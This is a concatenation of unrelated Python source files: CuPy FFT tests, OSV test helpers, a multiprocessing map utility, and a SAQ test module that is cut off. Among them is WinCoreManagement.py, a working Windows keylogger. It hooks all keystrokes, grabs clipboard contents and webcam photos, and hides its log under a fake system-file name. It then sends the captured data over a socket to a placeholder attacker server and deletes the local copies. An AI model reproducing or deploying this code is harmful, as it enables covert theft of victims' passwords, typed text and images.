@testing.for_all_dtypes()
def test_irfft2(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.irfft2(a, s=self.s, axes=self.axes, norm=self.norm)
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
class TestRfftn(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfftn(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfftn(self, xp, dtype):
if (10020 >= cupy.cuda.runtime.runtimeGetVersion() >= 10010
and int(cupy.cuda.device.get_compute_capability()) < 70
and _size_last_transform_axis(
self.shape, self.s, self.axes) == 2):
raise unittest.SkipTest('work-around for cuFFT issue')
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (), 'norm': None},
)
@testing.gpu
class TestRfftnEmptyAxes(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
def test_rfftn(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
@testing.for_all_dtypes()
def test_irfftn(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho'],
}))
@testing.gpu
class TestHfft(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_hfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.hfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ihfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ihfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'n': 1, 'd': 1},
{'n': 10, 'd': 0.5},
{'n': 100, 'd': 2},
)
@testing.gpu
class TestFftfreq(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftfreq(self, xp, dtype):
out = xp.fft.fftfreq(self.n, self.d)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfftfreq(self, xp, dtype):
out = xp.fft.rfftfreq(self.n, self.d)
return out
@testing.parameterize(
{'shape': (5,), 'axes': None},
{'shape': (5,), 'axes': 0},
{'shape': (10,), 'axes': None},
{'shape': (10,), 'axes': 0},
{'shape': (10, 10), 'axes': None},
{'shape': (10, 10), 'axes': 0},
{'shape': (10, 10), 'axes': (0, 1)},
)
@testing.gpu
class TestFftshift(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_fftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftshift(x, self.axes)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_ifftshift(self, xp, dtype):
x = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftshift(x, self.axes)
return out
class TestThreading(unittest.TestCase):
def test_threading1(self):
import threading
from cupy.cuda.cufft import get_current_plan
def thread_get_curr_plan():
return get_current_plan()
new_thread = threading.Thread(target=thread_get_curr_plan)
new_thread.start()
def test_threading2(self):
import threading
a = cupy.arange(100, dtype=cupy.complex64).reshape(10, 10)
def thread_do_fft():
b = cupy.fft.fftn(a)
return b
new_thread = threading.Thread(target=thread_do_fft)
new_thread.start()
|
tests.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test helpers."""
import datetime
import os
import requests
import subprocess
import tempfile
import threading
from unittest import mock
import pygit2
_EMULATOR_TIMEOUT = 30
_DATASTORE_EMULATOR_PORT = 8002
_DATASTORE_READY_INDICATOR = b'is now running'
TEST_PROJECT_ID = 'test-osv'
class MockRepo:
"""Mock repo."""
def __init__(self, path):
self.path = path
self._repo = pygit2.init_repository(path, True)
tree = self._repo.TreeBuilder().write()
author = pygit2.Signature('OSV', 'infra@osv.dev')
self._repo.create_commit('HEAD', author, author, 'Initial commit', tree, [])
def add_file(self, path, contents):
"""Adds a file."""
oid = self._repo.write(pygit2.GIT_OBJ_BLOB, contents)
self._repo.index.add(pygit2.IndexEntry(path, oid, pygit2.GIT_FILEMODE_BLOB))
self._repo.index.write()
def delete_file(self, path):
"""Delete a file."""
self._repo.index.remove(path)
self._repo.index.write()
def commit(self, author_name, author_email, message='Changes'):
"""Makes a commit."""
tree = self._repo.index.write_tree()
author = pygit2.Signature(author_name, author_email)
self._repo.create_commit('HEAD', author, author, message, tree,
[self._repo.head.peel().oid])
def start_datastore_emulator():
"""Starts Datastore emulator."""
os.environ['DATASTORE_EMULATOR_HOST'] = 'localhost:' + str(
_DATASTORE_EMULATOR_PORT)
os.environ['DATASTORE_PROJECT_ID'] = TEST_PROJECT_ID
os.environ['GOOGLE_CLOUD_PROJECT'] = TEST_PROJECT_ID
proc = subprocess.Popen([
'gcloud',
'beta',
'emulators',
'datastore',
'start',
'--consistency=1.0',
'--host-port=localhost:' + str(_DATASTORE_EMULATOR_PORT),
'--project=' + TEST_PROJECT_ID,
'--no-store-on-disk',
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
_wait_for_emulator_ready(proc, 'datastore', _DATASTORE_READY_INDICATOR)
return proc
def _wait_for_emulator_ready(proc,
emulator,
indicator,
timeout=_EMULATOR_TIMEOUT):
"""Waits for emulator to be ready."""
def _read_thread(proc, ready_event):
"""Thread to continuously read from the process stdout."""
ready = False
while True:
line = proc.stdout.readline()
if not line:
break
if not ready and indicator in line:
ready = True
ready_event.set()
# Wait for process to become ready.
ready_event = threading.Event()
thread = threading.Thread(target=_read_thread, args=(proc, ready_event))
thread.daemon = True
thread.start()
if not ready_event.wait(timeout):
raise RuntimeError(
'{} emulator did not get ready in time.'.format(emulator))
return thread
def reset_emulator():
"""Resets emulator."""
resp = requests.post(
'http://localhost:{}/reset'.format(_DATASTORE_EMULATOR_PORT))
resp.raise_for_status()
def mock_datetime(test):
"""Mocks datetime."""
for to_mock in ('osv.models.utcnow', 'osv.utcnow'):
patcher = mock.patch(to_mock)
mock_utcnow = patcher.start()
mock_utcnow.return_value = datetime.datetime(2021, 1, 1)
test.addCleanup(patcher.stop)
def mock_repository(test):
"""Creates a mock repo."""
tmp_dir = tempfile.TemporaryDirectory()
test.remote_source_repo_path = tmp_dir.name
test.addCleanup(tmp_dir.cleanup)
return MockRepo(test.remote_source_repo_path)
def mock_clone(test, func=None, return_value=None):
"""Mocks clone_repository."""
patcher = mock.patch('osv.repos.clone')
mocked = patcher.start()
if return_value:
mocked.return_value = return_value
else:
mocked.side_effect = func
test.addCleanup(patcher.stop)
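# --- Illustrative usage sketch (added for clarity; not part of the original helpers) ---
# One plausible way a unittest.TestCase could wire these helpers together. The
# function name, file name and author values below are hypothetical; only the
# helper functions defined above are real.
def _example_usage(test_case):
    """Hypothetical set-up flow for a test case using the helpers in this module."""
    mock_datetime(test_case)            # freeze the mocked utcnow() at 2021-01-01
    repo = mock_repository(test_case)   # temporary source repo, cleaned up automatically
    repo.add_file('OSV-2021-1.yaml', b'contents')
    repo.commit('User', 'user@example.com')
    return repo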
|
WinCoreManagement.py
|
import sys, os, time
import socket, struct, json
import win32clipboard  # clipboard operations; requires pywin32 to be installed
import win32con
import win32api
import cv2
from ctypes import windll
from ctypes import CFUNCTYPE
from ctypes import POINTER
from ctypes import c_int, c_void_p
from ctypes import byref
from ctypes.wintypes import MSG
from threading import Timer
from threading import Thread
from threading import Lock
# Utility helpers
class Utils:
    def __init__(self):
        # os.path.expanduser returns the host user's home directory (used for saving files)
        self.base_dir = os.path.expanduser('~')  # writing directly to the C: drive may hit permission problems; the home directory is always writable
        # create the log file on startup
        self.log_path = r'%s/adhsvc.dll.system32' % self.base_dir
        open(self.log_path, 'a', encoding='utf-8').close()
        win32api.SetFileAttributes(self.log_path, win32con.FILE_ATTRIBUTE_HIDDEN)
        # locks that serialize reads and writes
        self.mutex_log = Lock()  # log lock
        self.mutex_photo = Lock()  # photo lock
        self.mutex_sock = Lock()  # socket upload lock
        # server ip and port
        self.server_ip = '<your host IP address>'
        self.server_port = 9999
        # local debug log
        self.debug = True
        self.debug_log_path = r'%s/debug_log' % self.base_dir
        self.mutex_debug = Lock()
    # debug log used while developing, to make troubleshooting easier (visible file)
    def log_debug(self, res):
        if not self.debug: return
        # acquire the lock ----- uploading logs to the server, writing the debug log and writing the main log each use a lock,
        # so that only one of the three operations runs at a time
        self.mutex_debug.acquire()
        with open(self.debug_log_path, mode='a', encoding='utf-8') as f:
            f.write('\n%s\n' % res)
            # flush to make sure the message is actually written to the log
            f.flush()
        # release the lock
        self.mutex_debug.release()
    # main log, later uploaded to the server (hidden file)
    def log(self, res):
        self.mutex_log.acquire()
        with open(self.log_path, mode='a', encoding='utf-8') as f:
            f.write(res)
            f.flush()
        self.mutex_log.release()
    # takes photos and saves them on the host machine
    def take_photoes(self):
        while True:
            time.sleep(10)
            photo_path = r'%s/%s.jpeg' % (self.base_dir, time.strftime('%Y-%m-%d_%H_%M_%S'))
            cap = None
            try:
                # The first argument of VideoCapture() is the camera index; the built-in camera is usually 0 and external ones are 1, 2, 3, ...
                # Passing a video file path opens the video instead, e.g. cap = cv2.VideoCapture("../test.avi")
                # CAP_DSHOW is Windows-specific; the camera can stay on after cv2.release(), so this flag has to be given
                cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)
                ret, frame = cap.read()  # frame: the frame data grabbed from the camera
                # writing the data and uploading the photo data share the same lock
                self.mutex_photo.acquire()
                cv2.imwrite(photo_path, frame)  # write the frame data to a file, i.e. take the photo
            except Exception as e:
                self.log_debug('Camera error: %s' % e)
            finally:
                # always release the lock and close the camera
                self.mutex_photo.release()
                if cap is not None: cap.release()  # avoid calling release() on None
                # close any camera windows that were opened
                cv2.destroyAllWindows()
            if os.path.exists(photo_path):
                # mark the saved photo with the hidden attribute (FILE_ATTRIBUTE_HIDDEN)
                win32api.SetFileAttributes(photo_path, win32con.FILE_ATTRIBUTE_HIDDEN)
    # connect, build the header, send the data (shared by the log and photo uploads)
    def send_data(self, headers, data):
        try:
            # Windows can misbehave when many files are uploaded at the same time, so a lock serializes the uploads
            self.mutex_sock.acquire()  # do nothing else while data is being uploaded
            # standard connection boilerplate
            client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client.connect((self.server_ip, self.server_port))
            # serialize the header as JSON
            head_json = json.dumps(headers)
            head_json_bytes = bytes(head_json, encoding='utf-8')
            # send the header length, then the header, then the payload
            client.send(struct.pack('i', len(head_json_bytes)))
            client.send(head_json_bytes)
            client.sendall(data)
            client.close()
            res = (True, 'ok')
        # used for logging
        except ConnectionRefusedError as e:
            msg = 'Socket server is not running: %s' % e
            res = (False, msg)
        except Exception as e:
            msg = 'Other socket error: %s' % e
            res = (False, msg)
        finally:
            self.mutex_sock.release()
        return res
    def upload_log(self):
        while True:
            time.sleep(10)
            # only continue if the log file has content
            if not os.path.getsize(self.log_path): continue
            self.mutex_log.acquire()
            with open(self.log_path, mode='rb+') as f:
                data = f.read()
                # self.mutex_log.release()
                headers = {
                    'data_size': len(data),
                    'filename': os.path.basename(self.log_path)
                }
                self.log_debug('Sending log to the server......[{}]'.format(data))
                is_ok, msg = self.send_data(headers, data)
                if is_ok:
                    self.log_debug('Log [{}] sent successfully...'.format(data))
                else:
                    self.log_debug('Failed to send log [{}]: {}'.format(data, msg))
                    continue
                # truncate(0) clears the log file on the host
                f.truncate(0)
            self.mutex_log.release()
    def upload_photoes(self):
        while True:
            time.sleep(10)
            files = os.listdir(self.base_dir)
            # only pick up the .jpeg files in that directory
            files_jpeg = [file_name for file_name in files if file_name.endswith('jpeg')]
            for file_name in files_jpeg:
                file_path = r'%s/%s' % (self.base_dir, file_name)
                if not os.path.exists(file_path): continue
                self.log_debug('Starting to upload image: %s' % file_name)
                headers = {
                    'data_size': os.path.getsize(file_path),
                    'filename': file_name
                }
                self.mutex_photo.acquire()
                with open(file_path, mode='rb+') as f:
                    data = f.read()
                # the lock can be released right away here because the photo interval is fixed by us; the log upload above may still be receiving input while uploading
                self.mutex_photo.release()
                is_ok, msg = self.send_data(headers, data)
                if is_ok:
                    self.log_debug('Image %s sent......' % file_name)
                else:
                    self.log_debug('Failed to send image %s: %s' % (file_name, msg))
                    continue
                # delete the file once it has been uploaded
                os.remove(file_path)
utils = Utils()
# Class definition: a class that knows how to install and remove the hook
class Toad:
    def __init__(self):
        # windll.user32 exposes the user32 API used to register the wrapped callback with Windows
        self.user32 = windll.user32
        self.hooked = None
    # the leading __ makes this method internal only (not callable from outside)
    # the actual hook-installation logic
    def __install_hook_proc(self, pointer):
        # self.hooked is the handle returned by registering the hook (self.user32.SetWindowsHookExA)
        # think of it as the fishing rod (the remote-control handle)
        self.hooked = self.user32.SetWindowsHookExA(
            win32con.WH_KEYBOARD_LL,  # registers a global low-level keyboard hook that intercepts all keyboard messages.  # WH_KEYBOARD_LL = 13
            pointer,  # the Python function that was just wrapped into a C callable
            0,  # DLL handle for the hook function; 0 is fine here
            0  # all threads
        )
        return True if self.hooked else False
    # register the plain function func as the hook; func arrives as a Python function, but what ends up injected has to be converted into a C function
    def install_hook_proc(self, func):
        # these two lines are boilerplate whose overall job is to turn the Python function into a C function
        # CFUNCTYPE attaches C type declarations (int, void, ...) to the Python callable
        # CMPFUNC then wraps the Python function func; although the returned pointer is just a pointer,
        # it effectively already behaves as a C function
        CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
        pointer = CMPFUNC(func)  # obtain the hookProc function pointer
        # for clarity the actual installation logic lives in __install_hook_proc, so hand over to it here
        if self.__install_hook_proc(pointer):
            # if the hook registered successfully, note it in the debug log (for our own debugging)
            # once development is finished this log line is no longer needed
            utils.log_debug("%s start " % func.__name__)  # func.__name__ is the built-in attribute holding the function's name
        # msg is simply the result returned from listening to the Windows message loop
        msg = MSG()
        # listen for / fetch window messages; once a message enters the queue it is taken out and handed to the first hook in the chain
        # GetMessageA retrieves the messages returned for the hook; byref converts msg for the call
        self.user32.GetMessageA(byref(msg), None, 0, 0)
    def uninstall_hook_proc(self):
        if self.hooked is None:
            return
        self.user32.UnhookWindowsHookEx(self.hooked)  # remove the registered hook via its handle
        self.hooked = None
toad_obj = Toad()
# 2. Define the hook procedure (i.e. the logic we want to inject):
# it is just an ordinary function
# of the three parameters nCode, wParam, lParam, only wParam (the specific keyboard action) is used in the body;
# all three are needed at the end when the hooked data is passed back down the chain
def monitor_keyborad_proc(nCode, wParam, lParam):
    # win32con.WM_KEYDOWN = 0X0100  # key pressed, value 256
    # win32con.WM_KEYUP = 0x0101  # key released, value 257; monitoring the keyboard only needs KEYDOWN
    if wParam == win32con.WM_KEYDOWN:
        # standard bit-mask operation
        hookedKey_ascii = 0xFFFFFFFF & lParam[0]
        # chr converts the ASCII code into a readable character
        hookedKey = chr(hookedKey_ascii)
        # debug log
        utils.log_debug('Hooked key: [%s] hookedKey_ascii: [%s]' % (hookedKey, hookedKey_ascii))
        keyboard_dic = {
            220: r'<`>',
            189: r'<->',
            187: r'<=>',
            8: r'<backspace>',
            9: r'<tab>',
            219: r'<[>',
            221: r'<]>',
            222: r'<\>',
            20: r'<caps lock>',
            186: r'<;>',
            192: r"<'>",
            13: r'<enter>',
            160: r'<lshift>',
            188: r'<,>',
            190: r'<.>',
            191: r'</>',
            161: r'<rshift>',
            162: r'<ctrl>',
            32: r'<space>',
            37: r'<left arrow>',
            38: r'<up arrow>',
            39: r'<right arrow>',
            40: r'<down arrow>',
        }
        if (hookedKey == 'Q'):  # enable while testing to unhook the program; comment this block out for a real run
            toad_obj.uninstall_hook_proc()
            sys.exit(-1)
            # pass
        if hookedKey_ascii in keyboard_dic:  # a non-standard key was pressed
            res = keyboard_dic[hookedKey_ascii]
            utils.log_debug('Input detected: {}'.format(res))
            utils.log(res)
        if hookedKey_ascii > 32 and hookedKey_ascii < 127:  # check whether the keystroke is a regular key (not a combination, etc.)
            if hookedKey == 'V' or hookedKey == 'C':
                win32clipboard.OpenClipboard()
                paste_value = win32clipboard.GetClipboardData()  # read the clipboard value
                win32clipboard.CloseClipboard()
                if paste_value:  # a non-empty clipboard means the V/C above was part of a shortcut and the useful user input sits in the clipboard
                    # write it into the main log
                    utils.log(paste_value)
                    # debug log
                    utils.log_debug('Clipboard value: {}'.format(paste_value))
            else:
                utils.log_debug('Input detected: {}'.format(repr(hookedKey)))
                utils.log(hookedKey)
    # CallNextHookEx passes the hooked information back down the hook chain
    return windll.user32.CallNextHookEx(toad_obj.hooked, nCode, wParam, lParam)
# Hook chain: hook 1, hook 2
# again just an ordinary function
# locking the keyboard simply means not passing the data back down the chain (i.e. not calling windll.user32.CallNextHookEx)
def lock_keyboard_proc(nCode, wParam, lParam):
    utils.log_debug('Keyboard lock routine is running........')
    return 'the return value here is arbitrary and has no effect'
if __name__ == '__main__':
    # monitor keyboard input -> and write it to the log
    t1 = Thread(target=toad_obj.install_hook_proc, args=(monitor_keyborad_proc,))
    # keyboard-lock feature
    # Timer runs a thread after the given delay (120 s)
    # t2 = Timer(120, toad_obj.install_hook_proc, args=[lock_keyboard_proc, ])
    # photo capture -> save image files
    # t3 = Thread(target=utils.take_photoes)
    # data upload: log files and image files
    t4 = Thread(target=utils.upload_log)
    t5 = Thread(target=utils.upload_photoes)
    # t2.daemon = True
    # t3.daemon = True
    t4.daemon = True
    t5.daemon = True
    t1.start()
    # t2.start()
    # t3.start()
    t4.start()
    t5.start()
    t1.join()
|
bettermap.py
|
#!/usr/bin/python3
import io
import sys
from concurrent.futures import ThreadPoolExecutor
import collections
import itertools
import multiprocessing as mp
import multiprocessing.connection
from multiprocessing.context import ForkProcess
from typing import Iterable, List, Optional, Any, Dict
import dill
from queue import Queue
from threading import Thread
mpctx = mp.get_context("fork")
def threaded_generator(g, maxsize: int = 16):
q = Queue(maxsize=maxsize)
sentinel = object()
def fill_queue():
try:
for value in g:
q.put(value)
finally:
q.put(sentinel)
thread = Thread(name=repr(g), target=fill_queue, daemon=True)
thread.start()
yield from iter(q.get, sentinel)
def slices(n: int, i: Iterable) -> Iterable[List]:
i = iter(i)
while True:
s = list(itertools.islice(i, n))
if len(s) > 0:
yield s
else:
break
def window(seq: Iterable, n:int = 2) -> Iterable[List]:
win = collections.deque(maxlen=n)
for e in seq:
win.append(e)
if len(win) == n:
yield list(win)
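# --- Illustrative sketch (added for clarity; not part of the original module) ---
# slices() chunks an iterable into fixed-size pieces, while window() yields a
# sliding window over it. Both are plain generators, so their behaviour can be
# checked without any multiprocessing.
def _slices_window_example():
    assert list(slices(2, range(5))) == [[0, 1], [2, 3], [4]]
    assert list(window(range(4), n=2)) == [[0, 1], [1, 2], [2, 3]]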
def map_per_process(
fn,
input_sequence: Iterable,
*,
serialization_items: Optional[List[Any]] = None,
parallelism: int = mpctx.cpu_count()
) -> Iterable:
if serialization_items is not None and len(serialization_items) > 0:
serialization_ids = [id(o) for o in serialization_items]
class MapPickler(dill.Pickler):
def persistent_id(self, obj):
try:
return serialization_ids.index(id(obj))
except ValueError:
return None
class MapUnpickler(dill.Unpickler):
def persistent_load(self, pid):
return serialization_items[pid]
else:
MapPickler = dill.Pickler
MapUnpickler = dill.Unpickler
def pickle(o: Any) -> bytes:
with io.BytesIO() as buffer:
pickler = MapPickler(buffer)
pickler.dump(o)
return buffer.getvalue()
def unpickle(b: bytes) -> Any:
with io.BytesIO(b) as buffer:
unpickler = MapUnpickler(buffer)
return unpickler.load()
pipeno_to_pipe: Dict[int, multiprocessing.connection.Connection] = {}
pipeno_to_process: Dict[int, ForkProcess] = {}
def process_one_item(send_pipe: multiprocessing.connection.Connection, item):
try:
processed_item = fn(item)
except Exception as e:
import traceback
send_pipe.send((None, (e, traceback.format_exc())))
else:
send_pipe.send((pickle(processed_item), None))
send_pipe.close()
def yield_from_pipes(pipes: List[multiprocessing.connection.Connection]):
for pipe in pipes:
result, error = pipe.recv()
pipeno = pipe.fileno()
del pipeno_to_pipe[pipeno]
pipe.close()
process = pipeno_to_process[pipeno]
process.join()
del pipeno_to_process[pipeno]
if error is None:
yield unpickle(result)
else:
e, tb = error
sys.stderr.write("".join(tb))
raise e
try:
for item in input_sequence:
receive_pipe, send_pipe = mpctx.Pipe(duplex=False)
process = mpctx.Process(target=process_one_item, args=(send_pipe, item))
pipeno_to_pipe[receive_pipe.fileno()] = receive_pipe
pipeno_to_process[receive_pipe.fileno()] = process
process.start()
# read out the values
timeout = 0 if len(pipeno_to_process) < parallelism else None
# If we have fewer processes going than we have CPUs, we just pick up the values
# that are done. If we are at the process limit, we wait until one of them is done.
ready_pipes = multiprocessing.connection.wait(pipeno_to_pipe.values(), timeout=timeout)
yield from yield_from_pipes(ready_pipes)
# yield the rest of the items
while len(pipeno_to_process) > 0:
ready_pipes = multiprocessing.connection.wait(pipeno_to_pipe.values(), timeout=None)
yield from yield_from_pipes(ready_pipes)
finally:
for process in pipeno_to_process.values():
if process.is_alive():
process.terminate()
def ordered_map_per_process(
fn,
input_sequence: Iterable,
*,
serialization_items: Optional[List[Any]] = None
) -> Iterable:
def process_item(item):
index, item = item
return index, fn(item)
results_with_index = map_per_process(
process_item,
enumerate(input_sequence),
serialization_items=serialization_items)
expected_index = 0
items_in_wait = []
for item in results_with_index:
index, result = item
if index == expected_index:
yield result
expected_index = index + 1
items_in_wait.sort(reverse=True)
while len(items_in_wait) > 0 and items_in_wait[-1][0] == expected_index:
index, result = items_in_wait.pop()
yield result
expected_index = index + 1
else:
items_in_wait.append(item)
def ordered_map_per_thread(
fn,
input_sequence: Iterable,
*,
parallelism: int = mpctx.cpu_count()
) -> Iterable:
executor = ThreadPoolExecutor(max_workers=parallelism)
input_sequence = (executor.submit(fn, item) for item in input_sequence)
input_sequence = threaded_generator(input_sequence, maxsize=parallelism)
for future in input_sequence:
yield future.result()
executor.shutdown()
def map_in_chunks(
fn,
input_sequence: Iterable,
*,
chunk_size: int = 10,
serialization_items: Optional[List[Any]] = None
) -> Iterable:
def process_chunk(chunk: List) -> List:
return list(map(fn, chunk))
processed_chunks = map_per_process(
process_chunk,
slices(chunk_size, input_sequence),
serialization_items=serialization_items)
for processed_chunk in processed_chunks:
yield from processed_chunk
def ordered_map_in_chunks(
fn,
input_sequence: Iterable,
*,
chunk_size: int = 10,
serialization_items: Optional[List[Any]] = None
) -> Iterable:
def process_chunk(chunk: List) -> List:
return list(map(fn, chunk))
processed_chunks = ordered_map_per_process(
process_chunk,
slices(chunk_size, input_sequence),
serialization_items=serialization_items)
for processed_chunk in processed_chunks:
yield from processed_chunk
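# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# map_per_process forks one child per input item (bounded by `parallelism`) and
# yields results as they complete, so output order is not guaranteed; the
# ordered_* variants restore input order. This relies on the "fork" start method
# pinned at the top of the module, so it assumes a Unix-like platform. The worker
# function below is hypothetical.
def _bettermap_example():
    def square(x):
        return x * x
    unordered = sorted(map_per_process(square, range(8)))
    ordered = list(ordered_map_in_chunks(square, range(8), chunk_size=3))
    assert unordered == ordered == [x * x for x in range(8)]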
|
test.py
|
# vim: sw=4:ts=4:et
#__all__ = [
#'EV_TEST_DATE',
#'EV_ROOT_ANALYSIS_TOOL',
#'EV_ROOT_ANALYSIS_TOOL_INSTANCE',
#'EV_ROOT_ANALYSIS_ALERT_TYPE',
#'EV_ROOT_ANALYSIS_DESCRIPTION',
#'EV_ROOT_ANALYSIS_EVENT_TIME',
#'EV_ROOT_ANALYSIS_NAME',
#'EV_ROOT_ANALYSIS_UUID',
#'create_root_analysis',
#'ACEBasicTestCase',
#'ACEEngineTestCase',
#'ACEModuleTestCase',
#'reset_alerts',
#'log_count',
#'wait_for_log_count',
#'WaitTimedOutError',
#'wait_for_log_entry',
#'track_io',
#'send_test_message',
#'recv_test_message',
#'splunk_query',
#'wait_for',
#'enable_module',
#'force_alerts',
#'GUIServer',
#'search_log',
#'search_log_regex',
#'search_log_condition',
#'TestEngine',
#'UNITTEST_USER_NAME',
#'UNITTEST_USER_ID',
#]
import atexit
import datetime
import logging
import os, os.path
import secrets
import shutil
import signal
import sys
import threading
import time
from multiprocessing import Manager, RLock, Pipe, Process
from unittest import TestCase
from subprocess import Popen, PIPE
import saq
import saq.engine
from saq.analysis import RootAnalysis, _enable_io_tracker, _disable_io_tracker
from saq.crypto import get_aes_key
from saq.database import initialize_database, get_db_connection, use_db
from saq.engine import Engine
from saq.error import report_exception
from saq.util import storage_dir_from_uuid, workload_storage_dir, abs_path
from saq.splunk import SplunkQueryObject
test_dir = None
UNITTEST_USER_NAME = 'unittest'
UNITTEST_USER_ID = None
# decorators
#
def track_io(target_function):
def wrapper(*args, **kwargs):
try:
_enable_io_tracker()
return target_function(*args, **kwargs)
finally:
_disable_io_tracker()
return wrapper
def force_alerts(target_function):
"""Alerts will be forced ON for the duration of this function."""
def wrapper(*args, **kwargs):
try:
saq.FORCED_ALERTS = True
return target_function(*args, **kwargs)
finally:
saq.FORCED_ALERTS = False
return wrapper
def reset_alerts(target_function):
"""Deletes all alerts in the database."""
def wrapper(*args, **kwargs):
with get_db_connection() as db:
c = db.cursor()
c.execute("""DELETE FROM alerts""")
db.commit()
return target_function(*args, **kwargs)
return wrapper
#
# utility functions
def enable_module(engine_name, module_name):
"""Adds a module to be enabled."""
saq.CONFIG[module_name]['enabled'] = 'yes'
saq.CONFIG[engine_name][module_name] = 'yes'
def wait_for(condition, interval=1, timeout=8):
"""Wait for condition to return True, checking every interval seconds until timeout seconds have elapsed.
Return True if condition returned True before timeout was exceeded, False otherwise."""
timeout = datetime.datetime.now() + datetime.timedelta(seconds=timeout)
while datetime.datetime.now() < timeout:
if condition():
return True
time.sleep(interval)
return False
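# --- Illustrative sketch (added for clarity; not part of the original utilities) ---
# wait_for polls an arbitrary condition instead of sleeping for a fixed time.
# The background "work" below is hypothetical and exists only to give the
# condition something to wait on.
def _wait_for_example():
    state = {'done': False}
    def _finish_soon():
        time.sleep(2)
        state['done'] = True
    threading.Thread(target=_finish_soon, daemon=True).start()
    return wait_for(lambda: state['done'], interval=1, timeout=8)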
# test comms pipe is used to communicate between test process and child processes
test_comms_p = None
test_comms_pid = None
test_comms_c = None
def open_test_comms():
global test_comms_p
global test_comms_pid
global test_comms_c
test_comms_p, test_comms_c = Pipe()
test_comms_pid = os.getpid()
def close_test_comms():
test_comms_p.close()
test_comms_c.close()
def get_test_comm_pipe():
# if we are the original process then we use the "parent" pipe
# otherwise we use the "child" pipe
if os.getpid() == test_comms_pid:
return test_comms_p
return test_comms_c
def send_test_message(message):
get_test_comm_pipe().send(message)
def recv_test_message():
return get_test_comm_pipe().recv()
test_log_manager = None
test_log_sync = None
test_log_messages = None
memory_log_handler = None
class WaitTimedOutError(Exception):
pass
#
# custom logging
class MemoryLogHandler(logging.Handler):
def acquire(self):
test_log_sync.acquire()
def release(self):
